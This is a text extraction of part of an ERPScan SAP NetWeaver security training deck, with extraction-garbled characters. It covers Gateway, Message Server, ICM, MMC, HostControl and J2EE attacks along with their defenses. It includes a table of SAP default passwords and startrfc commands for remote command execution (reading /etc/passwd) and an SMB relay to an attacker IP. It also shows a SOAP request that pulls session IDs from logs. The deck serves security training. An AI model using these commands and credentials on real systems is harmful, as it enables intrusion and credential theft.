erpscan.com   60  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  Gateway  security  

Page 61: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver  

 

erpscan.com   61  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 62: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Gateway  

SAP  Gateway  also  called  Applica%on  Server.  •  One  of  the  core  SAP  services  •  Allows  interac@on  with  remote  SAP  systems  and  also  with  other  

systems  •  Manages  the  communica@on  for  all  RFC  based  func@onality  

–  Gateway  monitor  (Administra@on  )  –  Gateway  Reader  (  RFC)    –  Gateway  work  process  (  logging  )  

 

 

 erpscan.com   62  ERPScan  —  Invest  In  Security  To  Secure  Investments  

hMp://scn.sap.com/people/maM.kangas/blog/2009/03/03/sap-­‐netweaver-­‐executables  

Page 63: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Gateway  Monitor  

•  Gateway  Monitor  •  Access  for  analyzing  gateway  process  •  You  can  specify  3  op@ons  for  security  

–  Gw/monitor=0  forbidden  access  –  Gw/monitor=1  only  local  access  (default  now)  

–  Gw/monitor=2  local  and  remote  access  (default  before  6.2)  

 

 

erpscan.com   63  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 64: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Gateway  Monitor  

•  If  Gw/monitor=2    it  is  possible  to  run  cri@cal  commands  and  obtain  some  informa@on    remotely  

•  Remote  monitoring  can  be  done  by  GWMON  tool  

•  Stored  in  /usr/exe/  •  Example:    gwmon  -­‐gwhost  127.0.0.1  -­‐gwserv  3200  

 

 

erpscan.com   64  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 65: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   65  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  9:  Playing  with  GWMON  

Page 66: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Gateway  RFC    (3  types)    

•  ABAP  RFC      –  client  call  SAP-­‐server  

•  Registered  RFC  Server  Program    –   Client  call  addi@onal  programs    installed  on  Other  servers  via  Gateway      

•  Started  RFC  Server  Program  –   Client  call  addi@onal  programs      that  installed  on  SAP-­‐server    

 erpscan.com   66  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 67: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ABAP  RFC  -­‐  overview  

•  Most  commonly  used  •  It  is  like  windows  RPC  •  User  can  call  ABAP  remote-­‐enabled  func@ons    •  need  to  know:    

–  System  id  –  Client  –  userid  –  password      

•  There  are  about  30000  different  RFC  func@ons    in  different  groups  

 

 

     

erpscan.com   67  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 68: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ABAP  RFC  -­‐  execu%ng  

How  to  call  RFC  func%on  remotely?  •  Use  default  tool  \usr\sap\ERP\SYS\exe\run\startrfc  •  Use  default  creden@als  or  exis@ng  user  creden@als    Example:                  >Startrfc.exe  -­‐3  –h  172.16.0.222  –s    01  –c    800  –F  RFC_PING  -­‐t  

 Don’t  miss  parameters  order  because  you  will  get  errors!          

 

     

erpscan.com   68  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 69: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

 ABAP  RFC  –  Anonymous  RFC’s    

•  Check  If  func@on  can  be  accessed  anonymously  •  There  are  some  func@ons  that  can  be  executed  anonymously  

–  RFC_PING  –  just  check  connec@on  –  RFC_SYSTEM_INFO    –  RFC_GET_LOCAL_DESTINATIONS  –  RFC_GET_LOCAL_SERVERS  –  SYSTEM_INVISIBLE_GUI  

 

 

     

erpscan.com   69  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 70: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   70  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  10:  ABAP  RFC  –  informa9on  disclose  issues  

Page 71: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Default  creden%als  

They  can  be  used  to  run  RFC  func@ons  remotely      

erpscan.com   71  ERPScan  —  Invest  In  Security  To  Secure  Investments  

USER   PASSWORD   Client  

SAP*   06071992,  PASS   000,001,066,Custom  

DDIC   19920706   000,001,Custom  

TMSADM   PASSWORD,  $1Pawd2&   000  

SAPCPIC   ADMIN   000,001  

EARLYWATCH   SUPPORT   066  

Page 72: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   72  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  11:  ABAP  RFC  –  user  crea9on  

Page 73: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ABAP  RFC  adacks  (SMBRELAY)  

•  EPS_DELETE_FILE  –  no  addi@onal  auth  checks  inside!  •  EPS_CLOSE_FILE  •  CLBA_CLASSIF_FILE_REMOTE_HOST  •  CLBA_UPDATE_FILE_REMOTE_HOST  •  EDI_DATA_INCOMMING  •  RZL_READ_FILE  •  50  more…..    Example:  

>Startrfc.exe -3 –h 172.16.0.222 –s 01 –t -F EDI_DATA_ICOMING –E PATHNAME=\\172.16.0.101\ERPScan\ -E PORT=SAPID3 –u SAPCPIC –p admin

 

     

erpscan.com   73  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 74: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ABAP  RFC  adacks  (Command  execu%on)  

•  SXPG_CALL_SYSTEM  (any  command  using  vulnerability)  Example:  

Startrfc.exe  -­‐3  -­‐h  172.16.0.222  -­‐s    01    

-­‐F  SXPG_COMMAND_EXECUTE  -­‐E  COMMANDNAME=TYPE  

-­‐E  ADDITIONAL_PARAMETERS=  cat/etc/passwd    

-­‐u  SAPCPIC  -­‐p  admin  

erpscan.com   74  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 75: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   75  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  12:  ABAP  RFC  –  remote  command  execu9on  

Page 76: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Gateway  Defense  

•  Secure  GW/monitor  •  Enable  Secinfo  and  Reginfo  ACL  (don’t  use  *)  •  Patch  for  latest  RFC  security  bypasses  rfc/reg_no_conn  •  Restrict  access  to  dangerous  RFC  func@ons  •  Enable  GW/logging  

   

erpscan.com   76  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 77: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   77  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  Message  Server  security  

Page 78: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver  

 

erpscan.com   78  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 79: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Message  Server  -­‐  overview  

•  The  SAP  Message  server  provides  two  services.    –  manages  SAP  communica@on  between  the  applica@on  servers  of  one  SAP  

system.    –  provides  load-­‐balancing  informa@on  to  clients  like  the  SAP  GUI.    

•  Before  7.0  listens  one  port  for  both  services    •  Since  7.0  default  installa@ons  automa@cally  split  into  

–   internal  port  (used  for  applica@on  server  connec@ons)  –   external  port  (used  for  user  connec@ons).  

•   This  is  defined  via  profile  parameters    –  rdisp/mshost,  -­‐  host  –  rdisp/msserv,  -­‐  port  –  rdisp/msserv_internal  must  be  !=0  

   

erpscan.com   79  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 80: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Message  Server  -­‐  adacks  

Why  should  we  make  2  ports  for  SAP  MS?  •  AMacker  can  register  fake  applica@on  server  on  message  server  

•  By  default  it  is  possible  without  authen@ca@on  •  He  can  make  MITM  and  sniff  client  connec@ons  

 

 

erpscan.com   80  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 81: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Message  Server  -­‐  ACL  

•  Even  if  you  restrict  access  to  message  server  from  GUI  clients    •  Applica@on  servers  can  access  it  •  Ms/acl_info  can  be  used  to  list  approver    app  servers  •  The  entries  must  have  the  following  syntax:  

HOST=[*| ip_adr | host_name | Subnet_mask | Domain ] [, ...] Examples for valid entries are: HOST = * (all hosts are allowed) HOST=host1,host2 (Logons allowed from host1 and host2) HOST=*.sap.com (all hosts in the sap.com domain can log on) HOST=147.45.56.32 (hosts with this IP address can log on) HOST=147.45.56.* (hosts with this subnet can log on)

 

 

erpscan.com   81  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 82: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Message  Server  monitoring  

•  SAP  Message  server  Monitoring    •  Can  remotely  get  informa@on  about  message  server    

–  check  and  change  all  the  important  se�ngs  

–  create  and  view  traces  –  read  sta@s@cs  

•  Managed  by  ms/monitor  op@on  

•   if  ms/monitor  =1  and  ms/admin_port  !=0  anybody  can  get  remote  access  by  using  “msmon”  tool  

 hMp://help.sap.com/saphelp_nw04/helpdata/EN/64/3e7�4a12e49b9856bb97970c6acc1/frameset.htm  

 

 

erpscan.com   82  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 83: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   83  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  15:  Playing  with  MSMON    

Page 84: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Message  server  -­‐  defense  

•  Disable  ms/monitor  •  Enable  ms/acl_info  and  manage  ACL  

•  Enable  ms/admin_port  

 

               hMp://help.sap.com/saphelp_nw04/helpdata/en/40/c235c15ab7468bb31599cc759179ef/frameset.htm  

erpscan.com   84  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 85: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   85  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  Message  Server  HTTP  

Page 86: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Message  server  HTTP  -­‐  info  

•  Message  Server  HTTP  •  Just  simple  HTTP  service  with  informa@on  

•  There  is  no  need  to  have  this  service    •  Informa@on  disclose  vulnerability  exist:  

–  Read  details  about  connected  instances  –  Read    SAP  parameters  

               

erpscan.com   86  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 87: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   87  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  16:  Message  Server  HTTP  –  parameter  

disclosure  

Page 88: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   88  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  NetWeaver  ICM  Security  

Page 89: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver  

 

erpscan.com   89  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 90: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Agenda  

 

•  History  of  SAP  web  applica@ons  and    ITS  •  ITS  vulnerabili@es  •  ICM  architecture  

•  ICM  vulnerabili@es  •  ICM  Defense  

 

 

erpscan.com   90  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 91: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ICM  (Cri%cal  services)  

More  than  1500  services  which  can  execute  cri@cal  func@onality  •  Every  registered  user  can  get  access  to  them  by  default  

– Most  services  require  authen@ca@on  –  You  can  use  any  of  defaults  to  aMack  –  By  default  all  ICF  services  are  not  assigned  to  any  Authoriza@on  value  

–  ANY  user  can  execute  any  ICF  service    (If  there  is  no  addi@onal  auth  checks  in  code  )  

–  There  are  many  cri@cal  services  which  can  be  used  by  unprivileged  user  to  escalate  privileges  

•  Also  there  are  about  40  anonymous  services  (Transac@on  SICF)  

 

   

erpscan.com   91  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 92: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ICM  (List  of  cri%cal  services)  

Some  examples  of  RFC  func@ons:  

•  /sap/public/info                                                                        anonymous  info  about  system  

•  /sap/public/icf_info/icr_groups                                                  installed  applica@ons  •  /sap/bc/soap/rfc                                                                                                                      remote  RRF  calls  

•  /sap/bc/srt/xip/sap                                                                                                    cri@cal  XI  func@ons  •  /sap/bw/Bex                                                                  reading  infoobjects  remotely  

•  /sap/bc/bsp/sap/htmlb_samples          test  service  with  vulnerabili@es  

•  /sap/bc/gui/sap/its/webgui                                                                                        webgui  access    

   

erpscan.com   92  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 93: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ICM  (Cri%cal  services)  

•  Service  /sap/public/info      -­‐  anonymous  info  about  system  

•  Can  be  called  anonymously  without  having  user  rights  

   

 

   

erpscan.com   93  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 94: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ICM  (Cri%cal  services)  

•  Service  /sap/public/icf_info/icr_urlprefix      installed  applica@ons  

   

   

erpscan.com   94  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 95: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   95  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  17:  ITS  Infdisclose  by  ERPScan  Pentes9ng  Tool  

Page 96: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Default  creden%als  

They  can  be  used  to  run  RFC  func@ons  remotely      

erpscan.com   96  ERPScan  —  Invest  In  Security  To  Secure  Investments  

USER   PASSWORD   Client  

SAP*   06071992,  PASS   000,001,066,Custom  

DDIC   19920706   000,001,Custom  

TMSADM   PASSWORD,  $1Pawd2&   000  

SAPCPIC   ADMIN   000,001  

EARLYWATCH   SUPPORT   066  

Page 97: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ICM  (Cri%cal  services)  

•  Cri@cal  service  sap/bc/soap/rfc    •  RFC  func@ons  are  mapped  to  RFC  authoriza@on  groups  

•  Security  of  standard  SOAP  RFC  calls  –  User  must  have  S_RFC  authoriza@on  to  group  of  RFC  func@ons  to  

execute  any  call  in  this  group  

–  User  must  have  authoriza@ons  which  are  defined  inside  RFC  func@on  to  execute  this  func@on  

–  Many  RFC  func@ons  don’t  have  any  special  authoriza@on  checks  so  every  user  can  call  them  by  SOAP  RFC  

   

 

   

erpscan.com   97  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 98: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   98  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  18:  SOAP  RFC’s  by  ERPScan  Pentes9ng  Tool  

Page 99: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

ICM  Service  Defense:  other  

•  Disable  or  configure  customized  HTTP  server  header  for  ICM  (sap  note  1329326)  

•  Disable  or  configure  disclosure  of  hidden  version    (sap  note  747818)  •  Disable  services  that  are  not  necessary  (note  1498575)    •  Configure  ICF  authoriza@on    for  enabled  services  •  Change  default  passwords  

 

 

 erpscan.com   99  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 100: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   100  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  Management  Console  security  

Page 101: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver  

 

erpscan.com   101  ERPScan  —  Invest  In  Security  To  Secure  Investments  

MMC  Service  

SAPHostcontrol  

Page 102: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  MMC  -­‐  overview  

•  MMC  is  installed  by  default  on  port  5<ID>13  •  Used  for  remote  management  of  SAP  servers  •  Command  executed  via  SOAP  interface  •  By  default  SSL  is  not  implemented  •  Administra@on  password  transmiMed  using  basic  auth  (base64)  •  By  sniffing  this  password  we  can  get  full  control  over  the  server  

 

 

erpscan.com   102  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 103: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  MMC    adacks  

•  Many  aMacks  can  be  implemented  without  authen@ca@on  •  AMacks  can  be  realized  by  sending  SOAP  requests  •  Mostly  it  is  informa@on  disclose  and  denial  of  service  

•  Also  OS  command  execu@on      •  All  MMC  aMacks  are  implemented  in  ERPScan  Pentes@ng  Tool    

 

erpscan.com   103  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 104: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  MMC  adacks    

ERPScan  Pentes@ng  Tool  modules  •  GET_VERSION_gSOAP.pl  

–  Obtaining  version  of  SAP  NetWeaver  •  GET_ENV_gSOAP.pl  

–  Obtaining  list  of  SAP  parameters  •  LIST_LOGS_gSOAP.pl  

–  Show  the  list  of  log  files  that  can  be  obtained  •  LIST_TRACE_gSOAP.pl  

–  Show  the  list  of  Trace  files  that  can  be  obtained  remotely  •  GET_LOGS_gSOAP.pl  

–  Sow  log  file  details  •  GET_TRACE_gSOAP.pl  

–  Show  trace  file  details    

 erpscan.com   104  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 105: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Advanced  MMC  Adacks  

•  SAP  MMC  provides  a  common  framework  for  centralized  system  management  

•  Allowing  to  see  the  trace  and  log  messages  •  File  userinterface.log  can  store  JSESSIONID  is  trace  is  ON  •  Using  JSESSIONID  from  logs,  aMacker  can  log  into  SAP  Portal    

erpscan.com   105  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 106: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Advanced  MMC  Adacks  <?xml  version="1.0"?>  <SOAP-­‐ENV:Envelope  xmlns:SOAP-­‐ENV="hMp://schemas.xmlsoap.org/soap/envelope/"  xmlns:xsi="hMp://

www.w3.org/2001/XMLSchema-­‐instance"  xmlns:xs="hMp://www.w3.org/2001/XMLSchema">  <SOAP-­‐ENV:Header>          <sapsess:Session  xmlns:sapsess="hMp://www.sap.com/webas/630/soap/features/session/">          <enableSession>true</enableSession>  </sapsess:Session>  </SOAP-­‐ENV:Header>  <SOAP-­‐ENV:Body>          <ns1:ReadLogFile  xmlns:ns1="urn:SAPControl">                  <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>                  <filter/>                  <language/>                  <maxentries>%COUNT%</maxentries>                  <statecookie>EOF</statecookie>          </ns1:ReadLogFile>  </SOAP-­‐ENV:Body>  </SOAP-­‐ENV:Envelope>  

erpscan.com   106  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 107: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   107  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  19:  SAP  MMC  agacks  by  ERPScan  Pentes9ng  

Tool  

Page 108: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  MMC-­‐  defense  

•  Install  Sapnote  927637  •  Install  Sapnote  1439348  –  informa@on  disclosure  in  MMC  •  Install  Sapnote  1469804  -­‐  Poten@al  DOS  in  sapstartsrv  •  Don’t  use  TRACE_LEVEL  =  3  in  produc@on  systems  •  Delete  traces  •  Disable  methods  service/protectedwebmethods  =  SDEFAULT  •  Disable  access  from  untusted  IP’s  

–  service/hdp/acl_file    –  service/hdps/acl_file    hMp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm    

       

   

erpscan.com   108  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 109: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   109  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  HostControl  security  

Page 110: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver  

 

erpscan.com   110  ERPScan  —  Invest  In  Security  To  Secure  Investments  

MMC  Service  

SAPHostcontrol  

Page 111: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAPHostControl  

•  Service  listens  on  port  1128/tcp.  •  Very  similar  to  MMC  

•  Many  aMacks  can  be  implemented  without  authen@ca@on  

•  AMacks  can  be  realized  by  sending  SOAP  requests  •  Vulnerability    in  the  GetDataBaseStatus  functon  •  Parameters  are  passed  to  dbmcli  executable  

•  SAP  MaxDB    only  

     

 

 

erpscan.com   111  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 112: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   112  ERPScan  —  Invest  In  Security  To  Secure  Investments  

DEMO  21:  SAP  HostControl  command  injec9on  by  

ERPScan  Pentes9ng  Tool  

Page 113: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

Defense  

•  Install  Sapnote  1341333    -­‐  command  injec@on  •  Disable  access  from  untusted  IP’s  

       

 

 erpscan.com   113  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 114: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

erpscan.com   114  ERPScan  —  Invest  In  Security  To  Secure  Investments  

SAP  NetWeaver  J2EE  security  

Page 115: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  NetWeaver  

 

erpscan.com   115  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 116: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

J2EE  Engine  

•  Automa@on   of   business   processes   like   ERP,   PLM,   CRM,   SRM  based  ABAP.  

•    Integra@on,   collabora@on   and   management   based   on   J2ee  engine:  –  SAP  Portal    –  SAP  PI  –  SAP  XI  –  SAP  Mobile  Infrastructure  –  SAP  Solu%on  Manager  

       

 

 

erpscan.com   116  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Many  SAP  systems  don’t  use  ABAP  stack  

Page 117: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

J2EE  Plalorm  Architecture    

       

 

 

erpscan.com   117  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 118: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

J2EE  Plalorm  services  

erpscan.com   118  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Service  Name   Port  Number   Default  Value   Range  (min-­‐max)  

 

Enqueue  server   32NN   3201   3200-­‐3299  HTTP   5NN00   50000   50000-­‐59900  

HTTP  over  SSL   5NN01   50001   50001-­‐59901  

IIOP   5NN07   50007   50007-­‐59907  

IIOP  Ini@al  Context   5NN02   50002   50002-­‐59902  

IIOP  over  SSL   5NN03   50003   50003-­‐59903  

P4   5NN04   50004   50004-­‐59904  

P4  over  HTTP   5NN05   50005   50005-­‐59905  

P4  over  SSL   5NN06   50006   50006-­‐59906  

Telnet   5NN08   50008   50008-­‐59908  

LogViewer  control   5NN09   50009   50009-­‐59909  

JMS   5NN10   50010   50010-­‐59910  

Page 119: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  J2EE  Services  

•  General  services  –  SAP  Visual  Admin  (P4)  –  SAP  NetWeaver  HTTP  (webserver)  

•  Addi@onal  services  –  SAP  Portal  –  SAP  SDM  –  SAP  SDM  Admin  –  SAP  LogViewer  –  SAP  J2EE  Telnet  

 

       

 

 

erpscan.com   119  ERPScan  —  Invest  In  Security  To  Secure  Investments  

Page 120: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

SAP  Security  storage  

erpscan.com   120  ERPScan  —  Invest  In  Security  To  Secure  Investments  

•  The  SAP  J2EE  Engine  stores  the  database  user  SAP<SID>DB    and  all  configura@ons  in    specific  file  

•  The  J2EE  Engine  uses  the  SAP  Java  Cryptography  Toolkit  to  encrypt  the  contents  of  the  secure  store  with  the  tripleDES  algorithm.  

•  \usr\sap\<SID>\SYS\global\security\data\SecStore.proper9es    

Page 121: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

config.proper%es  

erpscan.com   121  ERPScan  —  Invest  In  Security  To  Secure  Investments  

rdbms.maximum_connec@ons=5  system.name=TTT  secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key  secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.proper@es  secstorefs.lib=/oracle/TTTsapmnt/global/security/lib  rdbms.driverLoca@on=/oracle/client/10x_64/instantclient/ojdbc14.jar  rdbms.connec@on=jdbc/pool/TTT  rdbms.ini@al_connec@ons=1  

Page 122: Investinsecurity tosecureinvestments’ - ERPScan · Leading SAP AG partner in the field of discovering security vulnerabiliesbythenumberoffoundedvulnerabilies

secstore.proper%es  

erpscan.com   122  ERPScan  —  Invest  In  Security  To  Secure  Investments  

